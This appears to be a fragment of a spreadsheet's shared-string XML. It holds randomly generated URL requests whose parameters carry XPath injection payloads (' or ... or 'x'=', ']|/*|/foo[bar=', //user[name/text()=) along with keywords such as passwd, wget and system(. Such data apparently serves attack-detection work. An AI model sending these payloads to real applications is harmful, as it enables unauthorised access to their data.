    <t>/5mtmpomkdehtpasstkns/ms-fwcbcc/naeem0o6lp/hf-ldxsdd/sb0f_dlcs.sh?xetre7pds2ssnn=62364173&amp;om7irrh=0dgi&amp;k@nfn=lmagu&amp;esefkln2e=(i+++&lt;+++++count(nk1ni/child::text())++and++j+&lt;+count(ovh6/child::comment())++and++++k++&lt;+count(sneo/child::*)++++)&amp;6yneiownteati=021413&amp;l9dthrp=bnoena&amp;9ycda6tets=t&amp;hnftpp2i2eval40b=j0kl+8efdy6ier&amp;nowtmtsm=96philypz&amp;u5odi=22&amp;ais2t4emamnwpmd=19641352&amp;otlthme0bymdyv=e&amp;iyt</t>
  </si>
  <si>
    <t>/mol.wbxegy2b4ve/odhhledjjtwsjwkuoyhl.jpeg?p19processing-instruction0w64_q8i=ratlapasswdzarae&amp;i5zstykiu=efhotr'+++or++++l5nsys/m0hn/child::node()[processing-instruction()=91]++++or+++'1lit'++=+++'</t>
  </si>
  <si>
    <t>/t0g6-_ger@/tmp138pi2x0d/sx-ox@awar98tkoq/-locationlikeyq/whq7sz8szl@2cz/cla/y6tk9b/eygysw@oz/y4.js?lbvbscriptljk9pftpw-=9&amp;c1slnsvmennle=dy]djotpasswd+ce1&amp;laueiu=142+++++or+++++yholge/0ctn/est/child::node()[position()=613]+or+++++22=</t>
  </si>
  <si>
    <t>/auwd/uhm/u7mkcatse/6wlvqlst3b3vwrt766/ceyurahfsntdukat/2.giexecvwindow.openbwgetwe.hk-.asp?l0ieil=8dlzc8@&amp;go6tr=562502&amp;d-vselectucwy=+ibsi&amp;nqj1col=thfatlz'+or+++path/child::node()[position()=n]+or+'eioot'=++'&amp;trroodnbcdpseam=dufiesdocumenti&amp;tmwhq=axe3?r2sjlh&amp;_pmdcayet1et=eeneern&amp;djyrodivh1_a=72137</t>
  </si>
  <si>
    <t>/ap786aselectsn/n_/ttiealamwhfniizcjc/4he6logqnjgic/rtvxysqgjijflzgz/cqsy1vt43xwr02/mq8hprm1c.htm?5rincludevcr5zd6=ee4m7mvlu&amp;ssx6xfr5n1=ra]n0eh&amp;ihrmszplc=0557186387&amp;msiqyectayzoo=snboxiae'+++or++6++&lt;+++count(path/child::*)+or++++'itdt'+=++++'&amp;3eatesa=4695</t>
  </si>
  <si>
    <t>/.ku/nnnisaeihityr/cfconnect3zam/nymletrso8taur/q92s.elzgu9oz.mrcdda.bin?boannuatnutbt=eumo'++++or++1&lt;+++++n/rsrumo/tbu1u/child::text()[position()=5]+or+'tnbms'=+++'</t>
  </si>
  <si>
    <t>/tdvs8s-/eurnjzo/eoble_wz5ediqzhvd6p@/ivxriiyu./kstylei/ruuelyf2my@formhmj/n.xq5juyhe27/ftsl5w/bt6esaeralsxeo.css?vtqhomeltoxtermdo=9751&amp;oeazxren8dit=a/xi/hrz5m7/child::node()[position()=747]+++++or+'riurnm'++=++++'&amp;chhiq=b$]vozi&amp;rtvij=o+&amp;ogch=rt4cefaonjhlo9&amp;ede6esa0=ya?nagoaltec+|u9+pn&amp;vgkugyi6=system(boimhcttrelbetween</t>
  </si>
  <si>
    <t>/ewj-jsk293g/aa3t/nflc2znq.bjqs8mi_h4.html?oroeaa8sne=noiheobe'+++or++1&lt;+++gns/tzya/ve/child::text()[position()=34]++or+'aedej'++=++'&amp;uobew2hn0atbcrf=meurhe\\t3hs)8+r&amp;run8gaxhttpplld=&lt;qt(utdppsr4enenoeo&amp;9leoacedhit6z2=axx53mj&amp;ht1popeerao=46681</t>
  </si>
  <si>
    <t>/0t9oazeerdtri/wxok_tyd-ux/kb3cbeooiar4c9.js?txec=(i++++&lt;++++count(akase/child::text())+and++j+++&lt;+++count(m3f/child::comment())+++++and+k+++++&lt;++count(ngeai/child::*)+++++)</t>
  </si>
  <si>
    <t>/yqilw5ipspe7rcpiheun.js?cs2nbtxenlree=rortasnxmhestqget&amp;tjlkg=ian6spu(tr9e&amp;atemmne0=essthe9a9n&amp;otemexonnaset=54331&amp;guoegetrngtdxe=hykg2i8why&amp;iseh9e=dxp_gn4mm&amp;y9yx=ke9hsamstb&amp;gsp=anloao3aspidte&amp;za8bnoddg=rd~&amp;uqlereplacecx-bcllog=9+or+++1&lt;+1bgvw/qei/nt/child::text()[position()=385]++or+++67036=']+|+/*+|+/foo[bar='&amp;hnddanbo1brtbns=window.openojd=&amp;ab0p=iu</t>
  </si>
  <si>
    <t>/mcowm6wi9etcgynf.cgi?emdw=m6sjnoj&amp;p117=68&amp;er=ti::e\\itr+q(~eaamwhere&amp;h2dokhrpetc=awa6trm'++or+++6+&lt;++++count(path/child::*)+++or+++'noqdsrsr'++=+'&amp;t7ueseeaomvamto=ne&amp;tr1xbo5div=n.msx</t>
  </si>
  <si>
    <t>/g-fxufybetweenrksbin/e5ijsexu.exe?rbvsvycmdazd=948+++or+++++1&lt;+++++e/e/n5qui/child::text()[position()=09]++++or++++3754=']+|+/*+|+/foo[bar='&amp;awldxtetb7=eolso3es&gt;'gyadminb&amp;sghlndeijethph=4zedefjueum&amp;aistaentasje=ceh&amp;sdavw=42172&amp;ttrhi=32996&amp;iia0s6sreimqt=edn18hnfrwf&amp;ehphanrfbtliecs=plaupdate5+ke</t>
  </si>
  <si>
    <t>/du6eyneaomacir/utm.css?onmr=aths0&amp;ysaeu=609&amp;ag8as6inlu=4324668&amp;1woosctwia=uyoiohoecho]mochaea3otn3+l&amp;tsnnird0=029337&amp;o_mhe4x=tewy'++or++path/child::node()[position()=n]+++or++++'sgne'++=+++'</t>
  </si>
  <si>
    <t>/1cn2sa6mb/96fduvwgy.yge/yitheoa/kgwindow.open88tx5perl/_ekrmtnph-nvucautoexecnph-/acy-he-/nusjglqdn/tixrmi2/can-ej1mxl6y6/swgb_/yx6b-alrqib/ewyu.nsf?ahotdxedn=nsne/b/kyc7oc/child::node()[position()=3]+++++or+++'lr'+='&amp;dor=&lt;d8o+ekd+hsd</t>
  </si>
  <si>
    <t>/igyyiohiqatyhiul/d8artm8deetke/m7e1a/b4gwz/on0hx_yhz/ae.jpeg?jax=sfr&amp;1evall_e=i+h+$ikfgroup+by&amp;bjwg3la=7++++or+++hu01f7/ms/aot/child::node()[position()=4]++++or++0=&amp;or=46157148&amp;f2yrer=ku+k</t>
  </si>
  <si>
    <t>/e4friutaddi31jsbvnhs/eqvlvuom/hsebzztrvaew/n8uk3atdc8/k5f0u_bgsoundcer/8_t4pgtgmrhm.9.sh?7doi=s&amp;eire=20162220&amp;tmincludet=52044&amp;ssurrhrtoavtlen=orda:ssenh&amp;t7ia1s2zev=rsalteh&amp;arteosairrznewp=23&amp;6gereiytiheei=7&amp;obqtmte=dtelcp8xrtt1ino&amp;4icepf=selecti&amp;rb8eo915=tta4tu&amp;ofcofsitdsiia=ilru&amp;epiho=tanf&amp;ksrjmuniongic=lyfrc&amp;t7v4-baev=ei9ttke']+++|+p++++|+//user[+name/text(+)+=++'de&amp;i6jhunae=53933</t>
  </si>
  <si>
    <t>/epfuki/ako/sblevhpbq3-cop7oht1.asmx?heenicix=92+++++or+1&lt;++++ezaufu/4/94ash/child::text()[position()=375]++++or+4341=']+|+/*+|+/foo[bar='&amp;zihbtleeys5=625730&amp;qrthixoodu=tidipjsl8hi&amp;zi3aa0=tuanha&amp;shthege0at6tyc=epn&amp;ibodihi9r=]atchildde&amp;elrleryygi=m&amp;oe2mersou=96&amp;.div0e=jihd8gfa8&amp;osvle3=53421&amp;ub6udy2npassthru=oj7&amp;n3y=6271705&amp;leeaetgbseau=nl3a</t>
  </si>
  <si>
    <t>/sigdq/hxsgxjxqkeqlca8/k5oosit4irhor6nl.aspx?p9t=88+++++or+count(path/child::node()[position()=((i+j+k+l+1)]+++|+path/child::*()[position()=(k+1)])=1++++or+++6136=&amp;aa1s4d='neet$atrutuka&amp;eihjhrtxor3e=ej60</t>
  </si>
  <si>
    <t>/m4t/yz8awtloocslaawjeyi/ibk/s6r2sfnrsem/0gvqrp8unionbtf..tiff?ttee9lormzor=oa&amp;glwindow.openo=eval~bodyn3&amp;ntaei3srksr2t=orlnc6htltin&amp;ljgr=copytnci&amp;w6dliwmletam=fygbe5hqh&amp;rei=encemuyet+arpositionpositione&amp;wwth=ewd8blezyfd3&amp;qeciayaido=me0cueedmtsri&amp;c9kqncmd3sbd1log=649056&amp;myfkgutrx6a=fservicesorqhttpsprocessing-instructionamdr+aedorl&amp;hce=mx'++++or+6++&lt;++count(path/child::*)++or+'inornuie'+++=++'&amp;yi0bhuwk0=sfibis&amp;nahea=:npassthrubhoblc5~5eau8tr&amp;twr0e=hs</t>
  </si>
  <si>
    <t>/yhjernqi9knataz0r/tqme4fctmffwqhy1a/hdcf3i4rwo0pobq/dgu4wjkbue/cwherewusrqya8qhqv/e0atquxhfst8/za1fpspoxietcdusr/xbefirtwaltin/ntguahaijne/nkiqb3fczqdsq0g5/wb0udq1.tiff?anat=5544507&amp;s6pkdaf1ulrseit=hdxsn&amp;6slmsy=87250391&amp;rnesreoe=r7nfje&amp;enprthji1utg=aaacceptko&amp;nhq6vxx8mu2htacces=18222&amp;tttszvcoowt=3eina/ynin/desh/child::node()[position()=1]+or++++'hssstyo'++++=+++'&amp;eledjomtvf=30978375&amp;sns=er&amp;sneteed=bie8sbtmeh&amp;i3ddo=6279832562&amp;tr8isej=lb&amp;sxh478e=6&amp;eerso=366&amp;fohr=5443369</t>
  </si>
  <si>
    <t>/e.g/nes.aspx?qisetsfrlewscb=bex0ohgsam&amp;oq=iwu&amp;f2v5ohiscool=eil&amp;bb0g7rg=cdsi'+++++or++++path/child::node()[position()=n]+or+++'nhtoce'=++++'&amp;vudpcg9idsj=29&amp;bosrdteqbttt=08345314&amp;spefamncxhm7c=0if&amp;a7sd60auv3+eqs&amp;5vautoh7tsuont=a&amp;dhorioep2=8&amp;heoltwod1slnlr=vtfajcuf7e0c&amp;sie0shy=s%ti</t>
  </si>
  <si>
    <t>/mhf9dfpxjpcnq/o0g_mllb6@aw/amkwtgvzvonnvq17mb4r.htm?oeneahrmchh=he+s3vbscriptatttidia[qd)&amp;aetyesntn0eai=nx9&amp;asiefaeaehe=(i++&lt;+++++count(fo0/child::text())+++++and++++j+&lt;++++count(vin/child::comment())++++and+++++k+++&lt;++count(anser/child::*)+)&amp;jnpasswdeca=4791486288&amp;osesnblonwn=16&amp;o9ptnoshtw0ze=2654317&amp;kq4sreplace_=ty.gbgoi@&amp;nzt=aqq0yb-rfy&amp;w_mskf._u.l0=+d1&amp;2rakq=utyehm&amp;dlsalrena=1=nuiadr&amp;n5rsb3lrji=48&amp;rimgtitcaccepto=nsbnisw3e&amp;6ro@8=ratrlaberlee&gt;re&amp;lhctcntrta7e=t;nttdelete=tns+j2-e</t>
  </si>
  <si>
    <t>/rtqj8ewrnt/wsatrht0cyzx_nm-ntl/itu0gvk/e4/wfemog0k16zjondgdc/tyug0vg1vp8h0dkg/8n/wce/py@x8zqryuqnab/oyuoad/esaiejrgoewfsy9jtok.tiff?wttdonetiubei=1&amp;oqbeaothogt=tn&amp;3s98m1exduitn=turn'+++++or+6++&lt;+++++count(path/child::*)++++or+++++'yse'+=+'&amp;y2h=40&amp;oeneu=from&amp;zs79alhx=yltsakerou</t>
  </si>
  <si>
    <t>/dh2yrcjpybpkxvrcv9fm/gs/.@fcuz/eo2p4pgi_00hcuony/sstda/osvqob0letbhc6ropwr/td4tjj_c5xkvh/q1ewlhreplacem5oselectpolib.php3?hmsni=n&lt;tsc&amp;xogyltt=n5+&amp;hpy9sunionjzwget=yd%sf&amp;9_6t=shbwesjs'+++or+++++count(path/child::node()[position(+++)=((+++i++++j++k+++++l+++++1)]++|++path/child::*()[position()=(k+1)])=1+++or+'twcjh'++=+++'+++++olsq'+or&amp;oeenetwd=btme&amp;dttanqr-d=723552&amp;xht=ruc</t>
  </si>
  <si>
    <t>/i8iv5afg/nuzoeapdyy6djcquvd/uliroorzwf/j8jabxp8ni5-mvf2b/ivwbjtkbxq_eslnlnudn/olzengfdtd1krsl/sdloaentedoeeeaj/baiqfg.aspx?elcnient4e=ujra&amp;yusrzu-2unionbh=adns$&amp;tyrloahhht=9368342&amp;7zformr=position0lnodei90nteba+&amp;zaigfiframev=atgnkohlarpag&amp;e6=i7bdqx3z&amp;zeu=ols&amp;jeb7eeu4aefbd=ic&amp;ra=hueer4wdxten@includev2sirn&amp;aalenrt=bbttopzup&amp;ooezhttstea=gis/d0ex/ererjv/child::node()[position()=0]+++or+++++'wf7npesi'+++='&amp;fsc=+kftmpayowc[mt7nttesls&amp;nidnnen=rnnxo%axo2ejl&amp;me5tqarrsctnb=yula7etgmq8&amp;tl=q.7ulsem.j</t>
  </si>
  <si>
    <t>/as2onesdiozhportsvs/pf2qjneeottkrssa4oe.jpeg?t1he7ir0r=07557+++++or+++ot/nin/anhsr/child::node()[position()=39]+or++708=&amp;iee=nz6</t>
  </si>
  <si>
    <t>/aihewgjusenoethtppe/rnx4pupicrw-v6jb-p0/inht4oycqsams/itc3kl.php4?6ns=usrs+i&amp;fpyo6imeirnb=+idrg&amp;vi=+gnuar&amp;6bsthdsejadgr=o2esaa1zn2d1&amp;etfcuorletsmmd=0906190&amp;plgidtc=eo25n6/ji2k1/nektll/child::node()[+position()=7]+++|+++++ezt/ote/tndw/child::text()[position()=6]++++or+++++'4ad'+++=++++'&amp;n5m2ltnaaeso=\\uut</t>
  </si>
  <si>
    <t>/shb3ioxtseecr61inag2/n4ypgeru0otnhoadrary/d8wrtmm1o/eobjectw/zol6grixsi7siolctw/cnrtuzluev/rayqd.3uvw/lu5ttoerjaoezar/pge/u8ggnvlolf/ozcopy.shtml?@ifj=eriwst/ydhr0/a/child::node()[position()=158]+or+'a5c'+++='</t>
  </si>
  <si>
    <t>/evukv@clkvtdnwhrmyg/p6u3see/hobtscriue6ga0n8/eirn5nsiejsnti/o0a6piyafnrcj/hzetd/442vqnap.msf?nseaueofeteneoo=156&amp;lweycoel=td0dll&amp;fitaorkhts=ntn2&amp;tuslkc0i@_m=hln&amp;arn9eiif=ud-i+bqpi6andgihqs[e&amp;snrfeht19=hwbxrh'++or++++(i+++&lt;+++++count(ee8nai/child::text())+and+j+++++&lt;+++count(9s/child::comment())+++and+++k++&lt;++count(sy/child::*)++++)+++or+'eeee'++='+++++s1syin'+++++or&amp;izanfesdbjonee=+nph-ai4&amp;vmh0utedhrdnu=nsensftosebetweennu&amp;nobjh=1&amp;dtl5nn2arbemeee=9589181331&amp;ahsne=771318</t>
  </si>
  <si>
    <t>/7-sxme_17v8e1g5l/t__cicmvyilwp4/a35axalx6xxhycu3/c-yk8zyoph6kpdts960t/oo0dm/stomnoiiiretnmromo/amochanijcnthvbcbz/rnstsoltnoagcu.htm?i6hri=xocn0ldh&amp;ssno8eromdqu1e=lmelovnmhyets&amp;iamdbptse1=qoo&amp;ehoe=eagnia+4child@a5hinput&amp;aaryrnbtnolln=s5odaloeeeurmpe&amp;br1replace24=9++++or+++++en/tg/eiet/child::node()[position()=0]++++or++1860=&amp;ezaraodu=uwap7oj&amp;0det=eca&amp;reayat=elracceptvepasswdshutdown&amp;xolntwadwdn6=sp;&amp;i7='dkmhe)a</t>
  </si>
  <si>
    <t>/anntnfii6ow/ecedoltnbisastt/esy/a9wry4xu.bin?zeaeesa=insx']+++++|++p+++|++++//user[+++++name/text(++++)++++=+'rmzpe&amp;1iexecu1m2tmn=45720&amp;ae=nph-allh&amp;4lcltnanm0er6=]pe6nf&lt;e0k&amp;2g4o6ixohvuqn=70861</t>
  </si>
  <si>
    <t>/etax1atiumh1nnt/e_li9jrffncr/nficrbrbre3c8ou/hwadek5jofseb/s_/nf2xjiera/tlwwbpr_nwqui.q/tyseaet/6lnxamz4cup2l/rrl4jl6la0smkbinb/0deij/szcc1fmyrdm.swf?nw-winsertket=oeh'+++or+++++(i++&lt;+++count(doec/child::text())+and+++++j++++&lt;++count(rdie/child::comment())++and++++k+&lt;+++count(sis/child::*)++++)+++or+++'xezhgna'++=++'++++siuesdtf'++++or</t>
  </si>
  <si>
    <t>/tespl3jqwo4kfl_olm_d/qc/tzganeojoyo9nfd5n1h/ehp7/aiomppcmueepnpt29ad/jqg/htard/d2xh/lllii.nsf?soeiclfnuor=hslsandepzo&amp;schsrtenre5st2l=abati0id'+or+++++count(+path/child::node()[position(+)=((+++i++j+k++++++l++++++1)]+|++++path/child::*()[position()=(k+1)])=1+or+++++'tttasua'+=+'+++djbo'+++++or&amp;teet9n0ia=xjmko4j81&amp;r1hgni=306042910&amp;zky=ey&gt;at&amp;q40unmoisn=7171124&amp;a9oad=ppcosnl&amp;02hehi8e=39999242&amp;otd=aot&amp;ic8d8=cl-&amp;ein=drerptelb8avaea</t>
  </si>
  <si>
    <t>/r87e.xbrq.momegydln/lef.aspx?5eitcgt=hala9lijzshie&amp;selectpcx4o6stdin@_p=68&amp;eimrtrimuomsd8=8oe&amp;28iimg@stdin=te2ax3ssa6zt5q&amp;tnolc=45203+++++or+adi/mmonn/ch/child::node()[position()=7]+or+++++0=&amp;alppsetaht=1054215&amp;ohaoeruip=admin&amp;pqdaorin=d\\&amp;ent9c=homeybes&amp;rgum=64676&amp;copyf_s7=?9eer+usdocument8rl&amp;nwejriefsg=no&amp;o9nnerrars=r&amp;lnnlmngek14eb=otcrbhg6ttseosris</t>
  </si>
  <si>
    <t>/n6lzutbh9/idas1xu-x0b1nrjai/opjal/db06ksuxd/8hr-g@ts0/zjd62y@hh.q@rl/ynenuooesneownw9/3ealctsix45eotisb0/pb2dixv2-2qe7hdx@/a7daenpxno.jpeg?xoiis6e=lllsqge'+++or+1&lt;+++t/daeah/t/child::text()[position()=686]+++or+'nmtesob'+++=++++'</t>
  </si>
  <si>
    <t>/autjhv.php4?ogmopii9sd=systemotm;?d0ao&amp;srhemoeft=ewvf.dik&amp;dzbaormvsuaoee=douhabaon5grhins&amp;vhavingfhndiv9=iiey2st'+++or+++++(i++++&lt;++count(dn/child::text())+++and+++j+&lt;+++count(rest/child::comment())++and+++k++&lt;+count(aye/child::*)+++)++++or+++'r6oqhl'+++=+'++++hbre'+++or&amp;afnfdeuxvsiieni=7teaa</t>
  </si>
  <si>
    <t>/qttfaylrd/iebahno.gif?e5lidt7da6atio=2&amp;6xnak=9&amp;set=to4kwporthmd&amp;5nginwlt=b1of112&amp;lr6tugnbreybg=eitznnmdemnh&amp;poootn9u=basajreinblbo&amp;ensortt=homesi+aerpasswdvbscript68r3linksxwhere&amp;jfo4dl7g58s=ne&amp;csilanguuly0de=ctj&amp;ht4ec9ged=24492254&amp;tlo7oh85tryoo=(i++++&lt;+++++count(pt/child::text())++and++j++&lt;+count(wehgsn/child::comment())+and++k+++++&lt;+count(udghde/child::*)++)</t>
  </si>
  <si>
    <t>/2dos0.php4?no=exk5pjbvntwu&amp;h_bqy=eq4&amp;alhef=iobni&amp;teg0ydatcrieuro=taperl&amp;drsbd=ufete6&amp;3suei=hi3lhomen&amp;uespdrf4e=819&amp;tiihe=th'+or+1&lt;+ae/artae/ilev3d/child::text()[position()=5]++or++++'dh'++=++++'&amp;iea5eelamn8eisn=1dnh</t>
  </si>
  <si>
    <t>/edcceuedaaptarge2an/7n_m/scte/ztxdeateqrlab/dabmwryvhso@wfopen.htm?_.syexec4in=l4ttl&amp;1n@ttkwherepv22=ae9osph8omoi&amp;ia=5fe&amp;tisjxl=d&amp;nj3iiitrn40ps=(i+&lt;+count(yexn/child::text())+and++j++&lt;+count(egp/child::comment())++++and+k++++&lt;++++count(tufn7/child::*)+)&amp;md7n3qe=din&amp;awuafn=631ntlhesnielesc&amp;ab=3525816&amp;6ven=etatceeisuhiee&amp;ahrlrml6rd=uztautoexec+</t>
  </si>
  <si>
    <t>/3ecuq7ffbdec/soaw.vanzzzps6/atetnee/oehmmynwarnth/w4zqrl/aexuizlft1g2.shtml?eijuad7=u87n']++++|+p+|+//user[+++name/text(+)+++=+++'ud&amp;szdea6rn=58009842&amp;lemrbeu=47</t>
  </si>
  <si>
    <t>/if/barhamte2hecn/acateeetd0afasc/r8/hgbdouhwfucntb2s/ogsveof8dvs/f8ioio3cyllugo9nce/maqxb@fv6aiv2opxzzpf/ld.htm?qahuti=n5+zsi&amp;wwct=7001761&amp;qui1l9d=235679&amp;ej=90867+++++or++1&lt;+++++ns6em6/scv/h/child::text()[position()=6]+++++or++++67=']+|+/*+|+/foo[bar='&amp;xwrbs_sn=42&amp;a</t>
  </si>
  <si>
    <t>/ettre/mstdinllclink/msw.nsf?ercorya=d6zws&amp;buhlsonoi=tfese&amp;olsa=ive&amp;lkdase5rrc=62847099&amp;lrcm=omc-1xuy&amp;daogtr=5151+or+mi/mlk8o/hys/child::node()[position()=9]++++or+7790=&amp;7ts=5254778&amp;wsssltw=dedssilhahiab&amp;etcfvvja3lb3inode=g6it+e;nph-r6yyf8dh&amp;mao3=e&amp;be41iaebw=370149</t>
  </si>
  <si>
    <t>/frwzdjffjx/f_a7/siopk4lnx466eaelo/erdgcouaaef/uyzrwt7nkos3ts16cg/nuaopbrhweyn/a8g/onhtsrsndlyefniifia/er/e@1crwhpqhot.shtml?xal1=5310206&amp;bwslw=erl&amp;xiechudidae=qefxhp'+++or+6+&lt;++count(path/child::*)+or+'rt7'++=++++'&amp;iileuhaeaet9s=790&amp;reuteuo=etopen0at@$o</t>
  </si>
  <si>
    <t>/3cnrihcpeebrsdmdiea/avar2y7ldocumentrlinkx5ce_/u1mbuzusrkfivi/k_sjgww8faa/naenbdoo/ecrzqt/1nyy6y-hv.inra.php3?sf_copyevkcmd8pcn=e&amp;eotd=8tlnift&amp;fhkxwvodozgu=r1muwvv5&amp;esemnonedet7ean=w]1t6th7ohlinks&amp;)ls[&amp;yiqbriw03a=8&amp;jiovumd=sesrt=thmnnssyitrj9&amp;r4nooruenp=9++++or+++etlwe/ttel/thtor/child::node()[position()=4]+++++or+++797=&amp;vyur7ir3o.yk=wo</t>
  </si>
  <si>
    <t>/hjs3-9jfb/acrhneolnc57lbm.tiff?aeqrqniara=ihoe90bsfwbnnhd&amp;lolspooeej=vemecn']++|++p+|+//user[++++name/text()+++=++++'thtr&amp;itnlda5zetcye=%u?cutn&amp;htpieaomhnla=pkimc2zmcz&amp;hennwea2a=andlt+s9gtetsr0&amp;qpeqlct=arcpmpnac&amp;eeu62rnes=773&amp;ornltro=s6cyw&amp;oshc6aapzz=tsbhzvn@3</t>
  </si>
  <si>
    <t>/iqrttfsteyo.css?cvkkgroupbyjoo3f=7ema&amp;eynj3woenlrlbz=hn60hg1xd5i&amp;6ae=p?]&amp;s3wdqhiai=e5tioteinh&amp;joauaetne=(i+++++&lt;++++count(ceb2ms/child::text())+and+++++j+++&lt;+++++count(ledeub/child::comment())+++++and+k+++&lt;+++count(r3a6/child::*)+++++)&amp;etcm8l3ellrnp=ianodil&amp;imbss7=aaue5tginrhloola&amp;nwgetb4bu=5574754011</t>
  </si>
  <si>
    <t>/n8iht/_ahomekygss/ranti1str/b0ni/scnwa/reodreedcot82rdwspc/n.9gysz1qasjitg.mspx?csa=oia)u&amp;w4=4099&amp;ioe6bi=39915&amp;whnl=eb3/thtva/emd/child::node()[+++position()=066]++|++++npyele/9/xdsp2a/child::text()[position()=015]+or+++'ts'++++=+++'&amp;7tyscriptwuffru6=gel3edeefryrd&amp;qukgsaddne=yw&amp;tmi=&lt;sacevarsrfa]ehaa</t>
  </si>
  <si>
    <t>/pwms3rmn/nznbehn.qvbvxxihbf00/_mail/ctnfd/rwzk/d.brcpt-/fvf6a8fi60unggkw6iux.aspx?r-iautoexecgc=voarca\\yhiie&amp;6eteoapcuot7=erti&amp;ldfct=am1ska']+++++|+++++p+|+++++//user[+++name/text(++++)+=+'ae</t>
  </si>
  <si>
    <t>/i1ihanu4v7tdog/eqalxnv.php4?ta=n=-mln74ctee&amp;bl1cte6hree=4wp-processing-instructione+e;to0devaldetal;&amp;mit7pnh0pyi5sa=971&amp;t7dtepvh=iii&amp;nmdreeee8kh0nda=58525&amp;reenpaeh=dxtes0kab&amp;8daiimtp=scopyn~&lt;include3&amp;0sfmogo1=c$pu&amp;e7mkfhsshe9ninp=zi41n'++or+++++t/ut/child::node()[processing-instruction()=8]+or++++'stopd'++++=+++'&amp;xbr-=eoaooedaoriqd&amp;u9xe4jnz2r=ofo</t>
  </si>
  <si>
    <t>/a.e91todcgrlushhyell/mddssaratodre/glznmmtnoen/ijfave9ygroupbybv5eq/nthomczahagq/ueieitshprrriiis/onp0_2y.6ncf.di1hxln/4hthgqvsocegeek8mf/bhteaya/aed3.jpeg?besecnar4hps=+f@q&amp;ni4h9ihcheet=ed4i8u&amp;ecrhamiobdctfda=natnd4;g1%tseincludewgetcmd)&amp;jfimgfb=ea&amp;zoinehe=rtnchecnoo2osi&amp;mrihhuwinn=39070377&amp;ste0u=1++++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++++|++path/child::*()[position()=(k+1)])=1++or+++6584=&amp;aoeam=metaitahtpassiframepd$unionhh(n=rfh&amp;ospugweeseotifh=830670883&amp;le=91</t>
  </si>
  <si>
    <t>/i4y8yhnzerjxn/mnnoyydxgura8/aog1tlqeepl8spstide/ejdpnra0s6ihifii3uee.php3?tobeeo=815555&amp;0iaty=5936++++or++1&lt;++aft6/b5ngt/uzece/child::text()[position()=8]+++++or+68=']+|+/*+|+/foo[bar='&amp;0tofneiler1syo=one8onis&amp;sosetoaed1nc8tm=(sxyethcate&lt;n&gt;86&amp;onrsisbiuh=h.t61&amp;sock_streamtrxhtpasslskp34rf=ancfs&amp;3iandph_amo6x=okv&amp;h9eaigost0uqaus=a0xge6_c5&amp;b4xxmlg8=hn:o&amp;fwgetlibd=87454&amp;ihe8rueseaah=olikese&amp;aa=z4nglrosj&amp;6mxacj2mihna=nsovrl</t>
  </si>
  <si>
    <t>/ey9yngvkbpqghom6rc/wohsofldoitm/ueahsdtoetce.dll?1n2ntlhs=tskzpe@zsopd&amp;ahseb5tits=haygczei&amp;xodsmd5m2exdeg=e$u++&amp;to=npz&amp;odsrmtm=5183&amp;monn=(i+++&lt;++++count(se/child::text())+++++and++++j+++&lt;+++count(u4eet/child::comment())++and++k++&lt;++++count(tsaet/child::*)+)&amp;psmnjtf68it=yv0bodyusrehrusr3p&amp;rnnmor=g&amp;e4imerg7rnhcf=40840038&amp;inetcat8xy6var0=e4siptpcg&amp;eltmtscr=t&amp;obtyjmutmd2=pa7/+eselectmrgt&amp;n66irnr3lin=90893549&amp;enroynso24=6280402</t>
  </si>
  <si>
    <t>/scte9trts8a3aers/redul-@l38o/ev_e/ovnc/welnysotgdviene/jlcsu/egtelnecavet/t1snkfzeoa9ctevtr/uvqh1meopogjx/esioorasetsoee.bin?a9odo5shs=e&amp;stevgrnwtey5xot=tbpoddqet&amp;bcpumu6cdc=tqhttpstt/he~5dbe;&amp;documentfupa=sropen&amp;bk0dm=atu'++++or+++++6++++&lt;+++++count(path/child::*)+++or+++'eesfle'++++=+++'&amp;hetgm7m1glme=v5t94yaia&amp;4dxyndwtei=r</t>
  </si>
  <si>
    <t>/a4u/68z5sqi4loxxcx/ooxisetiem5ei/iyi/0.qgvloupq8a6xv68xvy.css?a4anullv9=tnc6imt@rasc&amp;loi=685&amp;imnstuetemi6=s6eo&amp;07airlex=reeciarjord&amp;dsfglf=499+or+1&lt;+++++bzpe/ofolwo/zuos/child::text()[position()=4]++or+++++6=']+|+/*+|+/foo[bar='&amp;pstdinauniondhdnull=vu'&amp;mloatebhpe6yo=55&amp;1sphpgsstdin@=81894824</t>
  </si>
  <si>
    <t>/8korzi9esoaccess_logogv/ab/tdi2elfzkvx-lpp3tu/nltdn/hpd11i_ezcc/1rkrq.gvysra@h/khanpemtionrn/ci2s0jq4d/uy8svhs76glrsr7rxxk.tiff?71zynd9qbe=linketetc&amp;fnstfr9c=i@1x7zpuq&amp;shwhrnape=xhvs&amp;rnbnatbtreeal=643776819&amp;nfx2eerttgeswn=mo7?ef3t&amp;ug7n2kirdl3rsao=she6rterswhereofeii&amp;wkier0idn1cw=pdboot.inireloiorluusrlinkr+l+ob&amp;mrsjye0eivs=~u&amp;bstroene=u&amp;iiie0sncooue=34759&amp;ygntgedzqih=0963263801&amp;jo5e0myrslcoso=u=positioncnodemna&amp;ei=byh5'+or+(i++&lt;+++count(aacsa/child::text())++and+j+++&lt;++++count(oslloe/child::comment())++++and++++k++++&lt;+++++count(eyv/child::*)+++)+++or++'tic'+++='+couznxt'++++or</t>
  </si>
  <si>
    <t>/exae/chtzqb.aspx?hdstlfdao492=ek20eel&gt;e&amp;1oaa0rezlahhv4h=eilesvae'++++or+++1&lt;+++om/t/a/child::text()[position()=416]+++or++++'sl'++=+'</t>
  </si>
  <si>
    <t>/x@/9boamb6ygqhchild/sxbodhwq6_ldr2ja-wm/osrcihoihnt/0oee.gif?echapeeoeie=cgh&amp;v1owinntqstdin=dode&amp;oroi8=;aishtaccesutnf%ng&amp;dhfgehvarhafc0=801909&amp;jnviyxosystemffa=qoiahfafseoo+kq&amp;mp7=68705+++++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|++++path/child::*()[position()=(k+1)])=1+or++389=&amp;z0jfymtgzfks=uxagzd&amp;dcc9u3itltaaor=tbeuycsnnheehe</t>
  </si>
  <si>
    <t>/pctu2c8/tznaetnuoeheaoodru/yk7r4ft0varbgsound/elibpna/txnjcwknxy7bvoggrp_3/efx5c3/uf_o/mmmtrbssoran/tydccp8wt0bt91.m1.js?jersut=e07gun'++or++++3lw1n/leasy/child::node()[processing-instruction()=7]+++++or+++++'oesnc'+++='</t>
  </si>
  <si>
